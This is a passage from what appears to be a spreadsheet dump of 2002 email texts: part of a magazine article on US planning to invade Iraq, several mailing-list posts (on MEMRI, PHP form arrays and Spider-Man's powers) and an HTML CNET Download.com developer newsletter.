 declared, "Every regime of the Arab-Islamic world has proved a failure,"
 and Reuel Marc Gerecht, of the American Enterprise Institute, who published
 an article in The Weekly Standard about the need for a change of regime in
 Iran and Syria. (Those goals, Gerecht told me when we spoke, could be
 accomplished through pressure short of an invasion.)
 Several people I spoke with predicted that most, or even all, of the
 nations that loudly oppose an invasion of Iraq would privately cheer it on,
 if they felt certain that this time the Americans were really going to
 finish the job. One purpose of Vice-President Cheney's recent diplomatic
 tour of the region was to offer assurances on that matter, while gamely
 absorbing all the public criticism of an Iraq operation. In any event, the
 Administration appears to be committed to acting forcefully in advance of
 the world's approval. When I spoke to Condoleezza Rice, she said that the
 United States should assemble "coalitions of the willing" to support its
 actions, rather than feel it has to work within the existing infrastructure
 of international treaties and organizations. An invasion of Iraq would test
 that policy in more ways than one: the Administration would be betting that
 it can continue to eliminate Al Qaeda cells in countries that publicly
 opposed the Iraq operation.
 When the Administration submitted its budget earlier this year, it asked
 for a forty-eight-billion-dollar increase in defense spending for fiscal
 2003, which begins in October, 2002. Much of that sum would go to improve
 military pay and benefits, but ten billion dollars of it is designated as
 an unspecified contingency fund for further operations in the war on
 terrorism. That's probably at least the initial funding for an invasion of
 Iraq.
 This spring, the Administration will be talking to other countries about
 the invasion, trying to secure basing and overflight privileges, while Bush
 builds up a rhetorical case for it by giving speeches about the
 unacceptability of developing weapons of mass destruction. A drama
 involving weapons inspections in Iraq will play itself out over the spring
 and summer, and will end with the United States declaring that the terms
 that Saddam offers for the inspections, involving delays and restrictions,
 are unacceptable. Then, probably in the late summer or early fall, the
 enormous troop positioning, which will take months, will begin. The
 Administration obviously feels confident that the United States can
 effectively parry whatever aggressive actions Saddam takes during the troop
 buildup, and hopes that its moves will destabilize Iraq enough to cause the
 Republican Guard, the military key to the country, to turn against Saddam
 and topple him on its own. But the chain of events leading inexorably to a
 full-scale American invasion, if it hasn't already begun, evidently will
 begin soon.
 Lewis (Scooter) Libby, who was the principal drafter of Cheney's
 future-of-the-world documents during the first Bush Administration, now
 works in an office in the Old Executive Office Building, overlooking the
 West Wing, where he has a second, smaller office. A packet of
 public-relations material prompted by the recent paperback publication of
 his 1996 novel, "The Apprentice," quotes the Times' calling him "Dick
 Cheney's Dick Cheney," which seems like an apt description: he appears
 absolutely sure of himself, and, whether by coincidence or as a result of
 the influence of his boss, speaks in a tough, confidential, gravelly
 rumble. Like Condoleezza Rice and Bush himself, he gives the impression of
 having calmly accepted the idea that the project of war and reconstruction
 which the Administration has now taken on may be a little exhausting for
 those charged with carrying it out but is unquestionably right, the only
 truly prudent course.
 When I went to see Libby, not long ago, I asked him whether, before
 September 11th, American policy toward terrorism should have been
 different. He went to his desk and got out a large black loose-leaf binder,
 filled with typewritten sheets interspersed with foldout maps of the Middle
 East. He looked through it for a long minute, formulating his answer.
 "Let us stack it up," he said at last. "Somalia, 1993; 1994, the discovery
 of the Al Qaeda-related plot in the Philippines; 1993, the World Trade
 Center, first bombing; 1993, the attempt to assassinate President Bush,
 former President Bush, and the lack of response to that, the lack of a
 serious response to that; 1995, the Riyadh bombing; 1996, the Khobar
 bombing; 1998, the Kenyan embassy bombing and the Tanzanian embassy
 bombing; 1999, the plot to launch millennium attacks; 2000, the bombing of
 the Cole. Throughout this period, infractions on inspections by the Iraqis,
 and eventually the withdrawal of the entire inspection regime; and the
 failure to respond significantly to Iraqi incursions in the Kurdish areas.
 No one would say these challenges posed easy problems, but if you take that
 long list and you ask, 'Did we respond in a way which discouraged people
 from supporting terrorist activities, or activities clearly against our
 interests? Did we help to shape the environment in a way which discouraged
 further aggressions against U.S. interests?,' many observers conclude no,
 and ask whether it was then easier for someone like Osama bin Laden to rise
 up and say credibly, 'The Americans don't have the stomach to defend
 themselves. They won't take casualties to defend their interests. They are
 morally weak.' "
 Libby insisted that the American response to September 11th has not been
 standard or foreordained. "Look at what the President has done in
 Afghanistan," he said, "and look at his speech to the joint session of
 Congress"-meaning the State of the Union Message, in January. "He made it
 clear that it's an important area. He made it clear that we believe in
 expanding the zone of democracy even in this difficult part of the world.
 He made it clear that we stand by our friends and defend our interests. And
 he had the courage to identify those states which present a problem, and to
 begin to build consensus for action that would need to be taken if there is
 not a change of behavior on their part. Take the Afghan case, for example.
 There are many other courses that the President could have taken. He could
 have waited for juridical proof before we responded. He could have engaged
 in long negotiations with the Taliban. He could have failed to seek a new
 relationship with Pakistan, based on its past nuclear tests, or been so
 afraid of weakening Pakistan that we didn't seek its help. This list could
 go on to twice or three times the length I've mentioned so far. But,
 instead, the President saw an opportunity to refashion relations while
 standing up for our interests. The problem is complex, and we don't know
 yet how it will end, but we have opened new prospects for relations not
 only with Afghanistan, as important as it was as a threat, but with the
 states of Central Asia, Pakistan, Russia, and, as it may develop, with the
 states of Southwest Asia more generally."
 We moved on to Iraq, and the question of what makes Saddam Hussein
 unacceptable, in the Administration's eyes. "The issue is not inspections,"
 Libby said. "The issue is the Iraqis' promise not to have weapons of mass
 destruction, their promise to recognize the boundaries of Kuwait, their
 promise not to threaten other countries, and other promises that they made
 in '91, and a number of U.N. resolutions, including all the other problems
 I listed. Whether it was wise or not-and that is the subject of debate-Iraq
 was given a second chance to abide by international norms. It failed to
 take that chance then, and annually for the next ten years."
 "What's your level of confidence," I asked him, "that the current regime
 will, in fact, change its behavior in a way that you will be satisfied by?"
 He ran his hand over his face and then gave me a direct gaze and spoke
 slowly and deliberately. "There is no basis in Iraq's past behavior to have
 confidence in good-faith efforts on their part to change their behavior."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</si>
  <si>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Re: [zzzzteana] Re: That wacky imam
</t>
  </si>
  <si>
    <t xml:space="preserve">Martin Adamson wrote:&gt;&gt;And we know how unbiased MEMRI is, don't we....
 &gt;&gt;
 &gt; 
 &gt; Oh, of course, you're right, any information not coming from a source that 
 &gt; fits your pre-conceived world view can simply be dismissed out of hand.
 &gt; 
 &gt; Martin
 &gt; 
 For goddess' sake Martin that seems to be exactly what you're doing.  You 
 started your reply to Tim's posting of the Guardian article by suggesting that 
 it was factually inaccurate.  Did you actually read it or did you just assume 
 that if the Grauniad writes about a Muslim extremist they must be making him out 
 as an all round nice guy?
 Stewart
 -- 
 Stewart Smith
 Scottish Microelectronics Centre, University of Edinburgh.
 http://www.ee.ed.ac.uk/~sxs/
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">At 06:10 PM 19/08/2002 +0100, Dave Wilson wrote:
 &gt;In order for PHP to parse the results of the SELECT MULTIPLE after it's 
 &gt;submitted, the variable name needs to end with []. That's great; PHP will 
 &gt;take each selected element and plant them as consecutive elements in an 
 &gt;array. But that makes for quite messy code when trying to link the regions 
 &gt;SELECT action with the sites SELECT MULTIPLE. Javascript can't refer to 
 &gt;the SELECT MULTIPLE by name because of the brackets, so I have to refer to 
 &gt;it by its location in the form.
 er, i understood you until you reached the above. Maybe its my lack of PHP 
 but why would a variable name _need_ to end with [] ?
 With most languages you parse the submitted form data and should come out 
 with either variables or an array / hash, which you then work with and name 
 whatever you like.
 Lee Hosty -x- hostyle AT csn.ul.ie -x- +353 (0)86 8768780
 --
 YONDER BOGINE (n.)
 The kind of restaurant advertised as 'just three minutes from this cinema' 
 which
 clearly nobody ever goes to and, even if they had ever contemplated it, have
 certainly changed their mind since seeing the advert.
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Gecko adhesion finally sussed.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Elias Sinderson &lt;elias@cse.ucsc.edu&gt; writes:
     E&gt; ... The strength to weight ratio of a spider is so high
     E&gt; that Spiderman is able to throw a bus several city blocks with
     E&gt; little effort. His endurance is similarly enhanced as well.
 Could this be as simple as a modified molecular structure where the
 humanoid cells are in fact exo-skeletally structured with more atoms
 per cubic angstrom to achieve the distance-squared tensile strength
 enhancements we find when we introduce smaller metal atoms between the
 lattice packed grid of iron atoms to create steel?  
 This 'steel-effect' might give bone structure and tendons dramatically
 (several orders of magnitude) more tensile strength without the need
 to significantly increase the weight (like magnesium-alloy or
 carbon-fiber weight compared to iron, Spidey could even be way under
 weight).  Only increasing tensile strength could accommodate the
 mobility and leverage feats since bones are actually formed from
 bubbles of organic material hydrolically assisted, tensile strength
 cross-sectionally would give his frame the strength to withstand the
 muscular enhancement.
     E&gt; As for the spidey senses, well they're really great, but AFAIK
     E&gt; not really well explained in the comic series. 
 If the same close-packing gap-filling arachne-molecular structure
 modification occurs in neural tissues, and there'd be no reason to
 think that these would grow differently from bones and tendons, then
 what we are seeing in spidey sense is no more than the heightened
 cerebral functions due to shorter/faster/stronger synapses throughout
 the entire nervous system.  
 Since we know dogs and cats measure human emotions by smell, clearly
 hearing the heartbeats, and other subtle clues within their normal
 sensory ranges (but seem mystical to us) ...  for Peter Parker,
 everything from air currents on his facial-hairs to extremely subtle
 hormone smells might coallesce into a general gestalt of Spidey-Sense;
 don't forget that he'd acquired this ability in adolescence and thus
 would lack any cultural or even pathological basis to explain the
 heightened awareness to himself in anything but mystical terms. We
 know from issue #1 that his collision-avoidance reflex response time
 was far swifter than his cognitive awareness since he 'found' himself
 already stuck to the tree when the bicycle was already past and hence
 his disorientation ("You ok, Mister?") as if it was a hallucination.
 Hmmm ... it may even be physio-psychologically interesting to examine
 if Peter Parker's personal quandries arose _because_ his physiological
 'Spidey' infrastructure had been advanced whereas his psychological
 perception of his self had not, ie, "Peter" was not "Spiderman" but
 just the "driver of the bus".  Only, unlike ourselves, he found his
 self driving a body-vehicle not evolutionarily matched to his
 cognitive time-scales.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Supersonic test plane uses 'wing warping'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8081289,1440/
 Date: Not supplied
 The US Air Force is set to test the steering and control technique first used 
 during the Wright brothers' famous flight in 1903
</t>
  </si>
  <si>
    <t xml:space="preserve">Nanananana
 C
 On Friday, August 30, 2002, at 02:19  AM, Justin Mason wrote:
 &gt; Looks like my algos aren't flexible enough, and Craig wins ;)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Download Dispatch: Tools for Software Developers&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 5.50.4616.200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#eeeeee&gt;
 &lt;CENTER&gt;
 &lt;!-- header --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#ffffff border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=442 colSpan=4&gt;&lt;IMG height=60 alt="Download Dispatch - Tools
 for Software Developers"
 src="http://download.cnet.com/i/dl/scr/442_downldHDR_softwr.gif"
 width=442&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=0 width=442 bgColor=#ffcc00 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000 colSpan=3&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=10 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=430&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/TD&gt;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&lt;/A&gt;&lt;BR&gt;&amp;nbsp;&lt;BR&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- featured collections --&gt;
 &lt;IMG height=20 src="http://a.r.tv.com/cnet.1d/i/nl/shw/rhc_featcol.gif"
 width=150&gt;&lt;BR&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lrt5UaQUvBz6gEwTinhlyR" &gt;Stamp out the bugs
 &lt;BR&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 Does your code need a once-over? Debug your software with this collection of tools and utilities designed to locate and correct programming mistakes, track defects, and more.
 &lt;BR&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;!-- end featured collections --&gt;
 &lt;!-- &lt;P&gt;&lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWZOIe5QH3XX8owMnerlR" &gt;&lt;IMG height=40
 src="http://catchup.cnet.com/catchup_btn2.gif" width=160 border=0&gt;&lt;/a&gt;
 &lt;P&gt; --&gt;
 	&lt;!-- updates &amp; drivers --&gt;
 	&lt;IMG height=20 alt="Software Updates"
 src="http://www.cnet.com/i/nl/dl/rhc_up.gif" width=150&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xDVaFVomap_vCgSyiL4R" &gt;XML Spy Suite 4.4&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Open and edit XML, XSL, 3DML, or DTD documents.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2MVLxtrNQ1U5MauO37xrR" &gt;JadeIDE for Java 3.0
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Use this GUI to edit your source code more easily.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWWMSEzgA8IeOdSKzjX1iR" &gt;UniquE RAR File Library 0.4.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Enable your applications to create and decompress RAR archives.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB6raNgZ0x-EDvznhjonlZR" &gt;SkICMP ActiveX Control 2.2&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Diagnose, troubleshoot, and monitor your network.&lt;P&gt;
 	&lt;!-- end updates &amp; drivers --&gt;
 &lt;!-- shopper upgrades --&gt;
 &lt;IMG height=20 alt="Software
 Upgrades"src="http://a.r.tv.com/cnet.1d/i/nl/cu/rhc_shopper.gif"
 width=150&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD colSpan=2&gt;&lt;FONT face="Arial, Helvetica, sans-serif"
 size=2&gt;&lt;B&gt;Software Upgrades:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
  				 &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IIDd6JKw24YOLpk6Td6dR" &gt;
 				 ZoneAlarm Pro 3.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DGnfgjzKns2asfI8UkRR" &gt;
 				 Norton AntiVirus 2002&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQokH6V4Taf70SVbToBBPR" &gt;
 				 AdSubtract Pro 2.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJQDsa7Figi7yr9FKgnR" &gt;
 				 Microsoft Windows XP - Professional&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqyAiehm7ydDX7NdmUVSeR" &gt;
 				 Nero Burning ROM 5.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;6.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				                  &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvklENj4kHF6q-jPexAyR" &gt;
 				 Reason 2.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                    &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 	                       size=-1&gt;&lt;B&gt;&amp;nbsp;7.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 	                     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 	                     &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUkK0709ie23s1N87hJlR" &gt;
 				 Microsoft Windows XP - Home Edition&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 		                    size=-1&gt;&lt;B&gt;&amp;nbsp;8.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 		                  &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkh4U6j9b0QzbMuLbLad4R" &gt;
 				 QuickBooks Pro 2002&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;9.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzdpO0mtnhKQcaLlAI6OrR" &gt;
 				 Adobe Photoshop 7.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 size=-1&gt;&lt;B&gt;10.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qUUxswDmTiMEyR1N675iR" &gt;
 WinZip 8.1&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;p&gt;
 &lt;TR&gt;
 &lt;p&gt;&lt;TD colSpan=2&gt;
 &lt;P&gt;&lt;FONT face="Arial, Helvetica, sans-serif" size=-2&gt;Find a complete
 list of the 50 most popular software products at &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89w3bPx_ktQ3DlPfP8N4R" &gt;&lt;B&gt;CNET
 Shopper.com&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;p&gt;
 &lt;!--  end shopper upgrades --&gt;
 	&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/P&gt;&lt;/TD&gt;
 &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
 src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=430 bgColor=#ffffff&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 bgColor=#ffffef border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD rowSpan=2 width=10&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=10&gt;&lt;/TD&gt;
 &lt;TD colSpan=3&gt;
 &lt;!-- date --&gt;
 &lt;FONT face="arial, helvetica"
 size=-2&gt;July 17, 2002 &lt;/FONT&gt;
 &lt;!-- /date --&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;FONT color=#333333
 size=3&gt;&lt;B&gt;Greetings from Download.com!&lt;/B&gt;&lt;/FONT&gt;&lt;p&gt;
 No software developer is immune to bugs. Even the cleanest code
 will have to go through a debugging process, but some debuggers
 are more efficient than others. Check out Download.com's
 complete collection of debugging tools &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW17ylrk9Z5VKc-3P0BcR" &gt;here&lt;/a&gt;, and put away the
 can of Raid.&lt;p&gt;
 Also this week, we've got some very handy utilities. First,
 there's Chilkat, a cool zip/unzip ActiveX control that you can
 add to any language with ActiveX support (which is most major
 ones). But my personal favorite is VB-PowerWrap, a simple tool
 that takes all the far-flung bits and pieces of your Visual Basic
 masterpiece and socks them all away into one executable file
 for ease of distribution.&lt;p&gt;
 Becky Waring&lt;br&gt;
 Contributing Editor, CNET Download.com&lt;p&gt;
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;/TD&gt;&lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 	&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width=430&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;!-- Leads Module --&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;!--  reviews and features --&gt;
 &lt;TABLE border="0" cellPadding=10 cellSpacing=0 width=430&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;IMG alt="Reviews &amp;amp; Features"
 src="http://www.cnet.com/i/nl/lx/sub_rev.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410 border=0&gt;&lt;BR&gt;
 &lt;font size=-2&gt;From Builder.com&lt;/font&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;A name=h1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQcmtCEYjKHbtbXYzHRR" &gt;Achieving
 persistence with Entity Beans&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 Enterprise JavaBeans (EJB) allow for greater code reuse and
    flexibility. See how Entity Beans enable you to leverage EJB
    functionality in your apps.
 &lt;br /&gt;&lt;br /&gt;
 &lt;img src="http://home.cnet.com/b.gif" height=5 width=1&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0t742-K7Bc1bJBykEmZR" &gt;Counting
 lines of code can help measure progress&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 One developer has come around to thinking that counting lines
    of code can yield useful information. He explains why and
    shares a sample app that automates the process.
 &lt;p /&gt;
 &lt;/font&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;!-- End reviews and features --&gt;
 &lt;!-- picks of the week --&gt;
 &lt;IMG alt="Picks of the week"
 src="http://www.cnet.com/i/nl/dl/sub_picks.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;FONT size=-2&gt;in ActiveX&lt;/FONT&gt;&lt;BR&gt;
  &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK14addEXl6gJLkjCXMZHnR" &gt;Chilkat Zip 6.0.2&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Need to add zip capability to your apps? Create and
    decompress zip archives with the Chilkat Zip ActiveX
    control. The control provides easy access to individual files
    stored within a zip archive. You can search for a file within
    the zip using a wildcard string and then extract individual
    files or files matching a pattern. Files can be unzipped to
    any directory, and the control's memory management allows any
    size file to be compressed or decompressed in a constant
    memory footprint. The control allows you to compress directly
    from memory buffers or strings, as well as add multiple files
    with wildcarding. There's even a real-time progress monitor
    for zip and unzip operations. Chilkat supports Active Server
    Pages, Visual Basic, Visual C++, Delphi, C++ Builder, and all
    languages that use ActiveX controls.
 &lt;P&gt;
 &lt;FONT size=-2&gt;in Java&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1B4XYK9w3V0z6qjySJGeR" &gt;Anfy Java 2.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Anfy is a collection of 52 applets for Web pages, desktop
    wallpapers, or screensavers. Within the program's simple
    interface, you can quickly apply real-time graphic effects to
    GIF and JPEG images. Effects include 3D texture-mapped cube
    menus, lake effects, water and fire, deformations, zoom
    rotators, lens magnification, waving flags, animations,
    scrolling text, customizable IFS fractals, color changers,
    light shading, tunnels, and wormholes.
